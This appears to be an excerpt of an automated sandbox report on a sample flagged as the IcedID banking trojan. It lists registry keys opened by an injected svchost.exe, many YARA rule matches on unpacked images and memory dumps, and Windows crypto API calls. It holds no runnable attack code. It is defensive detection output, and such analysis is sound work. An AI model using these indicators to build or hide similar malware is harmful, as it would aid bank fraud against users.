Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

E-Banking Fraud

Yara detected IcedID

Source: Yara match	File source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_02533E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	3_2_02533E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_02693E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	5_2_02693E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	15_2_027E3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	17_2_02EC3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC3E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	19_2_02AC3E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F73E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	21_2_02F73E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_02893E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	23_2_02893E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B13E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	26_2_02B13E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A53E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	28_2_02A53E7E

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly
Source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID Payload Author: kevoreilly

Source: GziaFibS0d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
